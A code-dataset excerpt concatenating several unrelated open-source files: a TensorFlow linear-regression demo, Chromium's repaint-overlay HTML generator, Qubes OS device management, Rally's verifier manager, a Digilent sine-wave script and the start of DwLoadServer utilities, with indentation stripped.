learning_rate = 0.2
training_epochs = 201
display_step = 20
# Create 100 training data
train_X = np.random.rand(100).astype(np.float32)
train_Y = train_X * 0.1 + 0.3
# Try to find values for W and b that compute train_Y = W * train_X + b
# TensorFlow will learns, and best fit is W: [0.1], b: [0.3]
# tf Graph Input
X = tf.placeholder("float")
Y = tf.placeholder("float")
with tf.name_scope('Weights'):
W = tf.Variable(tf.random_uniform([1], -1.0, 1.0), name='Weight')
tf.summary.histogram(name = 'Weights', values = W)
with tf.name_scope('Biases'):
b = tf.Variable(tf.zeros([1]), name='Bias')
tf.summary.histogram(name = 'Biases', values = b)
with tf.name_scope('Formula'):
y = W * train_X + b
# Minimize the mean squared errors.
with tf.name_scope('Loss'):
loss = tf.reduce_sum(tf.pow(y-train_Y, 2))/train_X.shape[0]
# loss = tf.reduce_mean(tf.square(y - train_Y)) # Or use reduce_mean
tf.summary.scalar('Loss', loss)
with tf.name_scope('Train'):
optimizer = tf.train.GradientDescentOptimizer(learning_rate)
train = optimizer.minimize(loss)
# Initialize the variables (i.e. assign their default value)
init = tf.global_variables_initializer()
# Start training
with tf.Session() as sess:
# Output graph
merged = tf.summary.merge_all()
writer = tf.summary.FileWriter("log/LinearRegression/", graph = sess.graph)
# Run the initializer
sess.run(init)
# Fit all training data
for step in range(training_epochs):
sess.run(train)
if step % display_step == 0:
stepStr = str(int(step/display_step) + 1) + '.'
print(stepStr, sess.run(W), sess.run(b))
sess.run(loss, feed_dict={X: train_X, Y:train_Y})
summary = sess.run(merged, feed_dict={X: train_X, Y:train_Y})
writer.add_summary(summary, step)
plt.plot(train_X, train_Y, 'go', label='Original data')
plt.plot(train_X, sess.run(W) * train_X + sess.run(b), label='Fitted line')
plt.legend()
plt.show()
| mit | 6,974,094,202,091,287,000 | 30.094595 | 95 | 0.633203 | false |
geminy/aidear | oss/qt/qt-everywhere-opensource-src-5.9.0/qtwebengine/src/3rdparty/chromium/third_party/WebKit/Tools/Scripts/webkitpy/layout_tests/controllers/repaint_overlay.py | 6 | 5063 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import re
def result_contains_repaint_rects(text):
return isinstance(text, str) and re.search(r'"paintInvalidations": \[$', text, re.MULTILINE) is not None
def extract_layer_tree(input_str):
if not isinstance(input_str, str):
return '{}'
if input_str[0:2] == '{\n':
start = 0
else:
start = input_str.find('\n{\n')
if start == -1:
return '{}'
end = input_str.find('\n}\n', start)
if end == -1:
return '{}'
# FIXME: There may be multiple layer trees in the result.
return input_str[start:end + 3]
def generate_repaint_overlay_html(test_name, actual_text, expected_text):
if not result_contains_repaint_rects(actual_text) and not result_contains_repaint_rects(expected_text):
return ''
expected_layer_tree = extract_layer_tree(expected_text)
actual_layer_tree = extract_layer_tree(actual_text)
return """<!DOCTYPE HTML>
<html>
<head>
<title>%(title)s</title>
<style>
body {
margin: 0;
padding: 0;
}
iframe {
position: absolute;
top: 80px;
left: 0;
border: 0;
z-index: -1;
}
canvas {
position: absolute;
top: 80px;
left: 0;
z-index: 1;
}
#actual {
display: none;
}
</style>
</head>
<body>
<label><input id="show-test" type="checkbox" checked onchange="toggle_test(this.checked)">Show test</label>
<label><input id="use-solid-colors" type="checkbox" onchange="toggle_solid_color(this.checked)">Use solid colors</label>
<br>
<span id='type'>Expected Invalidations</span>
<div id=overlay>
<canvas id='expected' width='2000' height='2000'></canvas>
<canvas id='actual' width='2000' height='2000'></canvas>
</div>
<script>
var overlay_opacity = 0.25;
function toggle_test(show_test) {
iframe.style.display = show_test ? 'block' : 'none';
}
function toggle_solid_color(use_solid_color) {
overlay_opacity = use_solid_color ? 1 : 0.25;
draw_repaint_rects();
}
var expected = %(expected)s;
var actual = %(actual)s;
function rectsEqual(rect1, rect2) {
return rect1[0] == rect2[0] && rect1[1] == rect2[1] && rect1[2] == rect2[2] && rect1[3] == rect2[3];
}
function draw_rects(context, rects) {
for (var i = 0; i < rects.length; ++i) {
var rect = rects[i];
context.fillRect(rect[0], rect[1], rect[2], rect[3]);
}
}
function draw_layer_rects(context, result) {
context.save();
if (result.position)
context.translate(result.position[0], result.position[1]);
var t = result.transform;
if (t) {
var origin = result.transformOrigin || [result.bounds[0] / 2, result.bounds[1] / 2];
context.translate(origin[0], origin[1]);
context.transform(t[0][0], t[0][1], t[1][0], t[1][1], t[3][0], t[3][1]);
context.translate(-origin[0], -origin[1]);
}
if (result.paintInvalidations) {
var rects = [];
for (var i = 0; i < result.paintInvalidations.length; ++i) {
if (result.paintInvalidations[i].rect)
rects.push(result.paintInvalidations[i].rect);
}
draw_rects(context, rects);
}
context.restore();
}
function draw_result_rects(context, result) {
if (result.layers) {
for (var i = 0; i < result.layers.length; ++i)
draw_layer_rects(context, result.layers[i]);
}
}
var expected_canvas = document.getElementById('expected');
var actual_canvas = document.getElementById('actual');
function draw_repaint_rects() {
var expected_ctx = expected_canvas.getContext("2d");
expected_ctx.clearRect(0, 0, 2000, 2000);
expected_ctx.fillStyle = 'rgba(255, 0, 0, ' + overlay_opacity + ')';
draw_result_rects(expected_ctx, expected);
var actual_ctx = actual_canvas.getContext("2d");
actual_ctx.clearRect(0, 0, 2000, 2000);
actual_ctx.fillStyle = 'rgba(0, 255, 0, ' + overlay_opacity + ')';
draw_result_rects(actual_ctx, actual);
}
draw_repaint_rects();
var path = decodeURIComponent(location.search).substr(1);
var iframe = document.createElement('iframe');
iframe.id = 'test-frame';
iframe.width = 800;
iframe.height = 600;
iframe.src = path;
var overlay = document.getElementById('overlay');
overlay.appendChild(iframe);
var type = document.getElementById('type');
var expected_showing = true;
function flip() {
if (expected_showing) {
type.textContent = 'Actual Invalidations';
expected_canvas.style.display = 'none';
actual_canvas.style.display = 'block';
} else {
type.textContent = 'Expected Invalidations';
actual_canvas.style.display = 'none';
expected_canvas.style.display = 'block';
}
expected_showing = !expected_showing
}
setInterval(flip, 3000);
</script>
</body>
</html>
""" % {
'title': test_name,
'expected': expected_layer_tree,
'actual': actual_layer_tree,
}
| gpl-3.0 | 9,069,632,416,049,365,000 | 27.44382 | 120 | 0.623543 | false |
kalkin/qubes-core-admin | qubes/devices.py | 1 | 17113 | #
# The Qubes OS Project, https://www.qubes-os.org/
#
# Copyright (C) 2010-2016 Joanna Rutkowska <[email protected]>
# Copyright (C) 2015-2016 Wojtek Porczyk <[email protected]>
# Copyright (C) 2016 Bahtiar `kalkin-` Gadimov <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
'''API for various types of devices.
Main concept is that some domain main
expose (potentially multiple) devices, which can be attached to other domains.
Devices can be of different buses (like 'pci', 'usb', etc). Each device
bus is implemented by an extension.
Devices are identified by pair of (backend domain, `ident`), where `ident` is
:py:class:`str` and can contain only characters from `[a-zA-Z0-9._-]` set.
Such extension should provide:
- `qubes.devices` endpoint - a class descendant from
:py:class:`qubes.devices.DeviceInfo`, designed to hold device description (
including bus-specific properties)
- handle `device-attach:bus` and `device-detach:bus` events for
performing the attach/detach action; events are fired even when domain isn't
running and extension should be prepared for this; handlers for those events
can be coroutines
- handle `device-list:bus` event - list devices exposed by particular
domain; it should return list of appropriate DeviceInfo objects
- handle `device-get:bus` event - get one device object exposed by this
domain of given identifier
- handle `device-list-attached:class` event - list currently attached
devices to this domain
- fire `device-list-change:class` event when device list change is detected
(new/removed device)
Note that device-listing event handlers can not be asynchronous. This for
example means you can not call qrexec service there. This is intentional to
keep device listing operation cheap. You need to design the extension to take
this into account (for example by using QubesDB).
Extension may use QubesDB watch API (QubesVM.watch_qdb_path(path), then handle
`domain-qdb-change:path`) to detect changes and fire
`device-list-change:class` event.
'''
import asyncio
import qubes.utils
class DeviceNotAttached(qubes.exc.QubesException, KeyError):
'''Trying to detach not attached device'''
pass
class DeviceAlreadyAttached(qubes.exc.QubesException, KeyError):
'''Trying to attach already attached device'''
pass
class DeviceInfo(object):
''' Holds all information about a device '''
# pylint: disable=too-few-public-methods
def __init__(self, backend_domain, ident, description=None,
frontend_domain=None):
#: domain providing this device
self.backend_domain = backend_domain
#: device identifier (unique for given domain and device type)
self.ident = ident
# allow redefining those as dynamic properties in subclasses
try:
#: human readable description/name of the device
self.description = description
except AttributeError:
pass
try:
#: (running) domain to which device is currently attached
self.frontend_domain = frontend_domain
except AttributeError:
pass
if hasattr(self, 'regex'):
# pylint: disable=no-member
dev_match = self.regex.match(ident)
if not dev_match:
raise ValueError('Invalid device identifier: {!r}'.format(
ident))
for group in self.regex.groupindex:
setattr(self, group, dev_match.group(group))
def __hash__(self):
return hash((self.backend_domain, self.ident))
def __eq__(self, other):
return (
self.backend_domain == other.backend_domain and
self.ident == other.ident
)
def __lt__(self, other):
if isinstance(other, DeviceInfo):
return (self.backend_domain, self.ident) < \
(other.backend_domain, other.ident)
return NotImplemented
def __str__(self):
return '{!s}:{!s}'.format(self.backend_domain, self.ident)
class DeviceAssignment(object): # pylint: disable=too-few-public-methods
''' Maps a device to a frontend_domain. '''
def __init__(self, backend_domain, ident, options=None, persistent=False,
bus=None):
self.backend_domain = backend_domain
self.ident = ident
self.options = options or {}
self.persistent = persistent
self.bus = bus
def __repr__(self):
return "[%s]:%s" % (self.backend_domain, self.ident)
def __hash__(self):
# it's important to use the same hash as DeviceInfo
return hash((self.backend_domain, self.ident))
def __eq__(self, other):
if not isinstance(self, other.__class__):
return NotImplemented
return self.backend_domain == other.backend_domain \
and self.ident == other.ident
def clone(self):
'''Clone object instance'''
return self.__class__(
self.backend_domain,
self.ident,
self.options,
self.persistent,
self.bus,
)
@property
def device(self):
'''Get DeviceInfo object corresponding to this DeviceAssignment'''
return self.backend_domain.devices[self.bus][self.ident]
class DeviceCollection(object):
'''Bag for devices.
Used as default value for :py:meth:`DeviceManager.__missing__` factory.
:param vm: VM for which we manage devices
:param bus: device bus
This class emits following events on VM object:
.. event:: device-attach:<class> (device)
Fired when device is attached to a VM.
Handler for this event can be asynchronous (a coroutine).
:param device: :py:class:`DeviceInfo` object to be attached
.. event:: device-pre-attach:<class> (device)
Fired before device is attached to a VM
Handler for this event can be asynchronous (a coroutine).
:param device: :py:class:`DeviceInfo` object to be attached
.. event:: device-detach:<class> (device)
Fired when device is detached from a VM.
Handler for this event can be asynchronous (a coroutine).
:param device: :py:class:`DeviceInfo` object to be attached
.. event:: device-pre-detach:<class> (device)
Fired before device is detached from a VM
Handler for this event can be asynchronous (a coroutine).
:param device: :py:class:`DeviceInfo` object to be attached
.. event:: device-list:<class>
Fired to get list of devices exposed by a VM. Handlers of this
event should return a list of py:class:`DeviceInfo` objects (or
appropriate class specific descendant)
.. event:: device-get:<class> (ident)
Fired to get a single device, given by the `ident` parameter.
Handlers of this event should either return appropriate object of
:py:class:`DeviceInfo`, or :py:obj:`None`. Especially should not
raise :py:class:`exceptions.KeyError`.
.. event:: device-list-attached:<class> (persistent)
Fired to get list of currently attached devices to a VM. Handlers
of this event should return list of devices actually attached to
a domain, regardless of its settings.
'''
def __init__(self, vm, bus):
self._vm = vm
self._bus = bus
self._set = PersistentCollection()
self.devclass = qubes.utils.get_entry_point_one(
'qubes.devices', self._bus)
@asyncio.coroutine
def attach(self, device_assignment: DeviceAssignment):
'''Attach (add) device to domain.
:param DeviceInfo device: device object
'''
if device_assignment.bus is None:
device_assignment.bus = self._bus
else:
assert device_assignment.bus == self._bus, \
"Trying to attach DeviceAssignment of a different device class"
if not device_assignment.persistent and self._vm.is_halted():
raise qubes.exc.QubesVMNotRunningError(self._vm,
"Devices can only be attached non-persistent to a running vm")
device = device_assignment.device
if device in self.assignments():
raise DeviceAlreadyAttached(
'device {!s} of class {} already attached to {!s}'.format(
device, self._bus, self._vm))
yield from self._vm.fire_event_async('device-pre-attach:' + self._bus,
pre_event=True,
device=device, options=device_assignment.options)
if device_assignment.persistent:
self._set.add(device_assignment)
yield from self._vm.fire_event_async('device-attach:' + self._bus,
device=device, options=device_assignment.options)
def load_persistent(self, device_assignment: DeviceAssignment):
'''Load DeviceAssignment retrieved from qubes.xml
This can be used only for loading qubes.xml, when VM events are not
enabled yet.
'''
assert not self._vm.events_enabled
assert device_assignment.persistent
device_assignment.bus = self._bus
self._set.add(device_assignment)
def update_persistent(self, device: DeviceInfo, persistent: bool):
'''Update `persistent` flag of already attached device.
'''
if self._vm.is_halted():
raise qubes.exc.QubesVMNotStartedError(self._vm,
'VM must be running to modify device persistence flag')
assignments = [a for a in self.assignments() if a.device == device]
if not assignments:
raise qubes.exc.QubesValueError('Device not assigned')
assert len(assignments) == 1
assignment = assignments[0]
# be careful to use already present assignment, not the provided one
# - to not change options as a side effect
if persistent and device not in self._set:
assignment.persistent = True
self._set.add(assignment)
elif not persistent and device in self._set:
self._set.discard(assignment)
@asyncio.coroutine
def detach(self, device_assignment: DeviceAssignment):
'''Detach (remove) device from domain.
:param DeviceInfo device: device object
'''
if device_assignment.bus is None:
device_assignment.bus = self._bus
else:
assert device_assignment.bus == self._bus, \
"Trying to attach DeviceAssignment of a different device class"
if device_assignment in self._set and not self._vm.is_halted():
raise qubes.exc.QubesVMNotHaltedError(self._vm,
"Can not remove a persistent attachment from a non halted vm")
if device_assignment not in self.assignments():
raise DeviceNotAttached(
'device {!s} of class {} not attached to {!s}'.format(
device_assignment.ident, self._bus, self._vm))
device = device_assignment.device
yield from self._vm.fire_event_async('device-pre-detach:' + self._bus,
pre_event=True, device=device)
if device in self._set:
device_assignment.persistent = True
self._set.discard(device_assignment)
yield from self._vm.fire_event_async('device-detach:' + self._bus,
device=device)
def attached(self):
'''List devices which are (or may be) attached to this vm '''
attached = self._vm.fire_event('device-list-attached:' + self._bus,
persistent=None)
if attached:
return [dev for dev, _ in attached]
return []
def persistent(self):
''' Devices persistently attached and safe to access before libvirt
bootstrap.
'''
return [a.device for a in self._set]
def assignments(self, persistent=None):
'''List assignments for devices which are (or may be) attached to the
vm.
Devices may be attached persistently (so they are included in
:file:`qubes.xml`) or not. Device can also be in :file:`qubes.xml`,
but be temporarily detached.
:param bool persistent: only include devices which are or are not
attached persistently.
'''
try:
devices = self._vm.fire_event('device-list-attached:' + self._bus,
persistent=persistent)
except Exception: # pylint: disable=broad-except
self._vm.log.exception('Failed to list {} devices'.format(
self._bus))
if persistent is True:
# don't break app.save()
return self._set
else:
raise
result = set()
for dev, options in devices:
if dev in self._set and not persistent:
continue
elif dev in self._set:
result.add(self._set.get(dev))
elif dev not in self._set and persistent:
continue
else:
result.add(
DeviceAssignment(
backend_domain=dev.backend_domain,
ident=dev.ident, options=options,
bus=self._bus))
if persistent is not False:
result.update(self._set)
return result
def available(self):
'''List devices exposed by this vm'''
devices = self._vm.fire_event('device-list:' + self._bus)
return devices
def __iter__(self):
return iter(self.available())
def __getitem__(self, ident):
'''Get device object with given ident.
:returns: py:class:`DeviceInfo`
If domain isn't running, it is impossible to check device validity,
so return UnknownDevice object. Also do the same for non-existing
devices - otherwise it will be impossible to detach already
disconnected device.
:raises AssertionError: when multiple devices with the same ident are
found
'''
dev = self._vm.fire_event('device-get:' + self._bus, ident=ident)
if dev:
assert len(dev) == 1
return dev[0]
return UnknownDevice(self._vm, ident)
class DeviceManager(dict):
'''Device manager that hold all devices by their classess.
:param vm: VM for which we manage devices
'''
def __init__(self, vm):
super(DeviceManager, self).__init__()
self._vm = vm
def __missing__(self, key):
self[key] = DeviceCollection(self._vm, key)
return self[key]
class UnknownDevice(DeviceInfo):
# pylint: disable=too-few-public-methods
'''Unknown device - for example exposed by domain not running currently'''
def __init__(self, backend_domain, ident, description=None,
frontend_domain=None):
if description is None:
description = "Unknown device"
super(UnknownDevice, self).__init__(backend_domain, ident, description,
frontend_domain)
class PersistentCollection(object):
''' Helper object managing persistent `DeviceAssignment`s.
'''
def __init__(self):
self._dict = {}
def add(self, assignment: DeviceAssignment):
''' Add assignment to collection '''
assert assignment.persistent
vm = assignment.backend_domain
ident = assignment.ident
key = (vm, ident)
assert key not in self._dict
self._dict[key] = assignment
def discard(self, assignment):
''' Discard assignment from collection '''
assert assignment.persistent
vm = assignment.backend_domain
ident = assignment.ident
key = (vm, ident)
if key not in self._dict:
raise KeyError
del self._dict[key]
def __contains__(self, device) -> bool:
return (device.backend_domain, device.ident) in self._dict
def get(self, device: DeviceInfo) -> DeviceAssignment:
''' Returns the corresponding `qubes.devices.DeviceAssignment` for the
device. '''
return self._dict[(device.backend_domain, device.ident)]
def __iter__(self):
return self._dict.values().__iter__()
def __len__(self) -> int:
return len(self._dict.keys())
| gpl-2.0 | -1,120,786,019,905,310,100 | 34.87631 | 79 | 0.626191 | false |
openstack/rally | rally/verification/manager.py | 1 | 16784 | # All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import inspect
import io
import os
import re
import shutil
import sys
import pkg_resources
from rally.common.io import subunit_v2
from rally.common import logging
from rally.common.plugin import plugin
from rally import exceptions
from rally.verification import context
from rally.verification import utils
LOG = logging.getLogger(__name__)
URL_RE = re.compile(
r"^(?:(?:http|ftp)s?|ssh)://" # http:// or https://
r"(?:(?:[A-Z0-9](?:[A-Z0-9@-]{0,61}[A-Z0-9])?\.)+" # domain
r"(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|" # domain
r"localhost|" # localhost
r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})" # IP
r"(?::\d+)?" # optional port
r"(?:/?|[/?]\S+)$", re.IGNORECASE)
class VerifierSetupFailure(exceptions.RallyException):
error_code = 224
msg_fmt = "Failed to set up verifier '%(verifier)s': %(message)s"
def configure(name, platform="default", default_repo=None,
default_version=None, context=None):
"""Decorator to configure plugin's attributes.
:param name: Plugin name that is used for searching purpose
:param platform: Plugin platform
:param default_repo: Default repository to clone
:param default_version: Default version to checkout
:param context: List of contexts that should be executed for verification
"""
def decorator(plugin_inst):
plugin_inst = plugin.configure(name, platform=platform)(plugin_inst)
plugin_inst._meta_set("default_repo", default_repo)
plugin_inst._meta_set("default_version", default_version)
plugin_inst._meta_set("context", context or {})
return plugin_inst
return decorator
@plugin.base()
class VerifierManager(plugin.Plugin, metaclass=abc.ABCMeta):
"""Verifier base class.
This class provides an interface for operating specific tool.
"""
# These dicts will be used for building docs. PS: we should find a better
# place for them
RUN_ARGS = {"pattern": "a regular expression of tests to launch.",
"concurrency": "Number of processes to be used for launching "
"tests. In case of 0 value, number of processes"
" will be equal to number of CPU cores.",
"load_list": "a list of tests to launch.",
"skip_list": "a list of tests to skip (actually, it is a dict "
"where keys are names of tests, values are "
"reasons).",
"xfail_list": "a list of tests that are expected to fail "
"(actually, it is a dict where keys are names "
"of tests, values are reasons)."}
@classmethod
def _get_doc(cls):
run_args = {}
for parent in inspect.getmro(cls):
if hasattr(parent, "RUN_ARGS"):
for k, v in parent.RUN_ARGS.items():
run_args.setdefault(k, v)
doc = cls.__doc__ or ""
doc += "\n**Running arguments**:\n\n%s" % "\n".join(
sorted(["* *%s*: %s" % (k, v) for k, v in run_args.items()]))
doc += "\n\n**Installation arguments**:\n\n"
doc += ("* *system_wide*: Whether or not to use the system-wide "
"environment for verifier instead of a virtual environment. "
"Defaults to False.\n"
"* *source*: Path or URL to the repo to clone verifier from."
" Defaults to %(default_source)s\n"
"* *version*: Branch, tag or commit ID to checkout before "
"verifier installation. Defaults to '%(default_version)s'.\n"
% {"default_source": cls._meta_get("default_repo"),
"default_version": cls._meta_get(
"default_version") or "master"})
return doc
def __init__(self, verifier):
"""Init a verifier manager.
:param verifier: `rally.common.objects.verifier.Verifier` instance
"""
self.verifier = verifier
@property
def base_dir(self):
return os.path.expanduser(
"~/.rally/verification/verifier-%s" % self.verifier.uuid)
@property
def home_dir(self):
return os.path.join(self.base_dir, "for-deployment-%s"
% self.verifier.deployment["uuid"])
@property
def repo_dir(self):
return os.path.join(self.base_dir, "repo")
@property
def venv_dir(self):
return os.path.join(self.base_dir, ".venv")
@property
def environ(self):
env = os.environ.copy()
if not self.verifier.system_wide:
# activate virtual environment
env["VIRTUAL_ENV"] = self.venv_dir
env["PATH"] = "%s:%s" % (
os.path.join(self.venv_dir, "bin"), env["PATH"])
return env
def validate_args(self, args):
"""Validate given arguments to be used for running verification.
:param args: A dict of arguments with values
"""
# NOTE(andreykurilin): By default we do not use jsonschema here.
# So it cannot be extended by inheritors => requires duplication.
if "pattern" in args:
if not isinstance(args["pattern"], str):
raise exceptions.ValidationError(
"'pattern' argument should be a string.")
if "concurrency" in args:
if (not isinstance(args["concurrency"], int)
or args["concurrency"] < 0):
raise exceptions.ValidationError(
"'concurrency' argument should be a positive integer or "
"zero.")
if "load_list" in args:
if not isinstance(args["load_list"], list):
raise exceptions.ValidationError(
"'load_list' argument should be a list of tests.")
if "skip_list" in args:
if not isinstance(args["skip_list"], dict):
raise exceptions.ValidationError(
"'skip_list' argument should be a dict of tests "
"where keys are test names and values are reasons.")
if "xfail_list" in args:
if not isinstance(args["xfail_list"], dict):
raise exceptions.ValidationError(
"'xfail_list' argument should be a dict of tests "
"where keys are test names and values are reasons.")
def validate(self, run_args):
"""Validate a verifier context and run arguments."""
context.ContextManager.validate(self._meta_get("context"))
self.validate_args(run_args)
def _clone(self):
"""Clone a repo and switch to a certain version."""
source = self.verifier.source or self._meta_get("default_repo")
if not source or (
not URL_RE.match(source) and not os.path.exists(source)):
raise exceptions.RallyException("Source path '%s' is not valid."
% source)
if logging.is_debug():
LOG.debug("Cloning verifier repo from %s into %s."
% (source, self.repo_dir))
else:
LOG.info("Cloning verifier repo from %s." % source)
cmd = ["git", "clone", source, self.repo_dir]
default_version = self._meta_get("default_version")
if default_version and default_version != "master":
cmd.extend(["-b", default_version])
utils.check_output(cmd)
version = self.verifier.version
if version:
LOG.info("Switching verifier repo to the '%s' version." % version)
utils.check_output(["git", "checkout", version], cwd=self.repo_dir)
else:
output = utils.check_output(["git", "describe", "--all"],
cwd=self.repo_dir).strip()
if output.startswith("heads/"): # it is a branch
version = output[6:]
else:
head = utils.check_output(["git", "rev-parse", "HEAD"],
cwd=self.repo_dir).strip()
if output.endswith(head[:7]): # it is a commit ID
version = head
else: # it is a tag
version = output
self.verifier.update_properties(version=version)
def install(self):
"""Clone and install a verifier."""
utils.create_dir(self.base_dir)
self._clone()
if self.verifier.system_wide:
self.check_system_wide()
else:
self.install_venv()
def uninstall(self, full=False):
"""Uninstall a verifier.
:param full: If False (default behaviour), only deployment-specific
data will be removed
"""
path = self.base_dir if full else self.home_dir
if os.path.exists(path):
shutil.rmtree(path)
def install_venv(self):
"""Install a virtual environment for a verifier."""
if os.path.exists(self.venv_dir):
# NOTE(andreykurilin): It is necessary to remove the old env while
# performing update action.
LOG.info("Deleting old virtual environment.")
shutil.rmtree(self.venv_dir)
LOG.info("Creating virtual environment. It may take a few minutes.")
LOG.debug("Initializing virtual environment in %s directory."
% self.venv_dir)
utils.check_output(["virtualenv", "-p", sys.executable, self.venv_dir],
cwd=self.repo_dir,
msg_on_err="Failed to initialize virtual env "
"in %s directory." % self.venv_dir)
LOG.debug("Installing verifier in virtual environment.")
# NOTE(ylobankov): Use 'develop mode' installation to provide an
# ability to advanced users to change tests or
# develop new ones in verifier repo on the fly.
utils.check_output(["pip", "install", "-e", "./"],
cwd=self.repo_dir, env=self.environ)
def check_system_wide(self, reqs_file_path=None):
"""Check that all required verifier packages are installed."""
LOG.debug("Checking system-wide packages for verifier.")
reqs_file_path = reqs_file_path or os.path.join(self.repo_dir,
"requirements.txt")
with open(reqs_file_path) as f:
required_packages = [
p for p in f.read().split("\n")
if p.strip() and not p.startswith("#")
]
try:
pkg_resources.require(required_packages)
except (pkg_resources.DistributionNotFound,
pkg_resources.VersionConflict) as e:
raise VerifierSetupFailure(e.report(), verifier=self.verifier.name)
def checkout(self, version):
"""Switch a verifier repo."""
LOG.info("Switching verifier repo to the '%s' version." % version)
utils.check_output(["git", "checkout", "master"], cwd=self.repo_dir)
utils.check_output(["git", "remote", "update"], cwd=self.repo_dir)
utils.check_output(["git", "pull"], cwd=self.repo_dir)
utils.check_output(["git", "checkout", version], cwd=self.repo_dir)
def configure(self, extra_options=None):
"""Configure a verifier.
:param extra_options: a dictionary with external verifier specific
options for configuration.
:raises NotImplementedError: This feature is verifier-specific, so you
should override this method in your plugin if it supports
configuration
"""
raise NotImplementedError(
"'%s' verifiers don't support configuration at all."
% self.get_name())
def is_configured(self):
"""Check whether a verifier is configured or not."""
return True
def get_configuration(self):
"""Get verifier configuration (e.g., the config file content)."""
return ""
def override_configuration(self, new_configuration):
"""Override verifier configuration.
:param new_configuration: Content which should be used while overriding
existing configuration
:raises NotImplementedError: This feature is verifier-specific, so you
should override this method in your plugin if it supports
configuration
"""
raise NotImplementedError(
"'%s' verifiers don't support configuration at all."
% self.get_name())
def extend_configuration(self, extra_options):
"""Extend verifier configuration with new options.
:param extra_options: Options to be used for extending configuration
:raises NotImplementedError: This feature is verifier-specific, so you
should override this method in your plugin if it supports
configuration
"""
raise NotImplementedError(
"'%s' verifiers don't support configuration at all."
% self.get_name())
def install_extension(self, source, version=None, extra_settings=None):
"""Install a verifier extension.
:param source: Path or URL to the repo to clone verifier extension from
:param version: Branch, tag or commit ID to checkout before verifier
extension installation
:param extra_settings: Extra installation settings for verifier
extension
:raises NotImplementedError: This feature is verifier-specific, so you
should override this method in your plugin if it supports
extensions
"""
raise NotImplementedError(
"'%s' verifiers don't support extensions." % self.get_name())
def list_extensions(self):
"""List all verifier extensions.
Every extension is a dict object which contains
name and entry_point keys. example:
{
"name": p.name,
"entry_point": p.entry_point_target
}
"""
return []
def uninstall_extension(self, name):
"""Uninstall a verifier extension.
:param name: Name of extension to uninstall
:raises NotImplementedError: This feature is verifier-specific, so you
should override this method in your plugin if it supports
extensions
"""
raise NotImplementedError(
"'%s' verifiers don't support extensions." % self.get_name())
@abc.abstractmethod
def list_tests(self, pattern=""):
"""List all verifier tests.
:param pattern: Filter tests by given pattern
"""
def parse_results(self, results_data):
"""Parse subunit results data of a test run."""
# TODO(andreykurilin): Support more formats.
return subunit_v2.parse(io.StringIO(results_data))
@abc.abstractmethod
def run(self, context):
"""Run verifier tests.
Verification Component API expects that this method should return an
object. There is no special class, you do it as you want, but it should
have the following properties:
.. code-block:: none
<object>.totals = {
"tests_count": <total tests count>,
"tests_duration": <total tests duration>,
"failures": <total count of failed tests>,
"skipped": <total count of skipped tests>,
"success": <total count of successful tests>,
"unexpected_success":
<total count of unexpected successful tests>,
"expected_failures": <total count of expected failed tests>
}
<object>.tests = {
<test_id>: {
"status": <test status>,
"name": <test name>,
"duration": <test duration>,
"reason": <reason>, # optional
"traceback": <traceback> # optional
},
...
}
"""
| apache-2.0 | 5,558,008,805,250,458,000 | 38.214953 | 79 | 0.575608 | false |
andrasfuchs/BioBalanceDetector | Measurements/WaveForms/Experiments/SleepLogging/python/AnalogOut_Sine.py | 1 | 1355 | """
DWF Python Example
Author: Digilent, Inc.
Revision: 2018-07-19
Requires:
Python 2.7, 3
"""
from ctypes import *
import time
from dwfconstants import *
import sys
if sys.platform.startswith("win"):
dwf = cdll.dwf
elif sys.platform.startswith("darwin"):
dwf = cdll.LoadLibrary("/Library/Frameworks/dwf.framework/dwf")
else:
dwf = cdll.LoadLibrary("libdwf.so")
hdwf = c_int()
channel = c_int(0)
version = create_string_buffer(16)
dwf.FDwfGetVersion(version)
print("DWF Version: "+str(version.value))
dwf.FDwfParamSet(DwfParamOnClose, c_int(0)) # 0 = run, 1 = stop, 2 = shutdown
#open device
print("Opening first device...")
dwf.FDwfDeviceOpen(c_int(-1), byref(hdwf))
if hdwf.value == hdwfNone.value:
print("failed to open device")
quit()
dwf.FDwfAnalogOutNodeEnableSet(hdwf, channel, AnalogOutNodeCarrier, c_bool(True))
dwf.FDwfAnalogOutNodeFunctionSet(hdwf, channel, AnalogOutNodeCarrier, funcSine)
dwf.FDwfAnalogOutNodeFrequencySet(hdwf, channel, AnalogOutNodeCarrier, c_double(10000))
dwf.FDwfAnalogOutNodeAmplitudeSet(hdwf, channel, AnalogOutNodeCarrier, c_double(1.41))
dwf.FDwfAnalogOutNodeOffsetSet(hdwf, channel, AnalogOutNodeCarrier, c_double(1.41))
print("Generating sine wave...")
dwf.FDwfAnalogOutConfigure(hdwf, channel, c_bool(True))
dwf.FDwfDeviceClose(hdwf)
| gpl-3.0 | 3,638,763,380,392,265,000 | 26.653061 | 87 | 0.727675 | false |
6809/DwLoadServer | dwload_server/utils/file_tools.py | 1 | 2410 | # encoding:utf-8
"""
DwLoadServer - A DWLOAD server written in Python
================================================
:created: 2014 by Jens Diemer - www.jensdiemer.de
:copyleft: 2014 by the DwLoadServer team, see AUTHORS for more details.
:license: GNU GPL v3 or above, see LICENSE for more details.
"""
import fnmatch
import logging
import os
import time
log = logging.getLogger(__name__)
def padding(data, size, b=b"\x00"):
quanta, leftover = divmod(len(data), size)
# Pad the last quantum with zero bits if necessary
if leftover:
data += (b * (size - leftover))
return data
def fnmatch_case_insensitve(filename, pattern):
